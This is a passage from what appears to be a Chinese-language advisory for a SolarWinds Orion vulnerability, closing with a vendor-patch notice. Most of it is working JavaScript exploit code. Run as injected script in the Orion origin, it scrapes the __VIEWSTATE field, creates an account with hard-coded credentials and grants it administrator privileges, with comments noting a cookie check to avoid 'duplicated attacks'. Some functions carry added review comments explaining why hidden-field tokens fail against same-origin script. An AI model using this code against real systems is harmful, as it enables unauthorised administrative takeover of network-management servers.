http.open("POST", url, false);
http.setRequestHeader("Content-type",
"application/x-www-form-urlencoded");
http.setRequestHeader("Content-lenth", params.length);
http.setRequestHeader("Connection", "close");
http.send(params);
var response = http.responseText;
var doc = document.implementation.createHTMLDocument('');
doc.documentElement.innerHTML = response;
return(doc);
}
/**
 * Fetch a page with a blocking GET and parse the response text into a
 * separate HTML document that the caller can query.
 *
 * The request is synchronous (third argument of open() is false), so the
 * function returns only after the response has arrived. The markup is loaded
 * into a document created by createHTMLDocument(''), not into the page's own
 * document.
 *
 * Review note: the callers in this listing pass relative URLs, so the
 * request targets the origin of the page that runs the script. Any state
 * embedded in the returned page (hidden form fields included) is therefore
 * readable by that script.
 *
 * @param {string} url - Address to request.
 * @param {*} ref - Accepted but never read by this function.
 * @returns {Document} Document whose root element holds the response markup.
 */
function getHtmlBody(url, ref) {
  const request = new XMLHttpRequest();
  request.open('GET', url, false);
  request.send(null);

  // Read the body before building the holder document, as the original did.
  const markup = request.responseText;
  const parsed = document.implementation.createHTMLDocument('');
  parsed.documentElement.innerHTML = markup;
  return parsed;
}
/**
 * Look up the element with id "__VIEWSTATE" in a parsed page.
 *
 * The callers in this listing read `.value` on the result directly, so they
 * rely on the element being present.
 *
 * Review note: a value carried in a hidden form field can be read by any
 * script running in the same origin as the page. It therefore does not stop
 * form submissions made by script injected into that origin. The injection
 * point itself has to be fixed.
 *
 * @param {Document} doc - Parsed page to search.
 * @returns {?Element} Whatever doc.getElementById("__VIEWSTATE") yields.
 */
function getViewState(doc) {
  const viewStateField = doc.getElementById("__VIEWSTATE");
  return viewStateField;
}
var username = "myuser";
var password = "test";
// Check if we already attacked the host to avoid duplicated attacks
if (getCookie("o1") == null)
{
// Get the initial view-state
var doc1 =
getHtmlBody("/Orion/Admin/Accounts/Add/OrionAccount.aspx?AccountType=Orion");
// Create a new account with the given credentials
postCredentials(getViewState(doc1).value, username, password);
// Get the edit account view-state
var doc2 = getHtmlBody("/Orion/Admin/Accounts/EditAccount.aspx?AccountID="
+ username + "&AccountType=Edit");
// Assign our new account with administrative privileges
setAdminPriv(getViewState(doc2).value, username);
// Set the cookie to avoid duplicated attacks
setCookie("o1", 1, "");
}
建议:
--------------------------------------------------------------------------------
厂商补丁:
SolarWinds
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: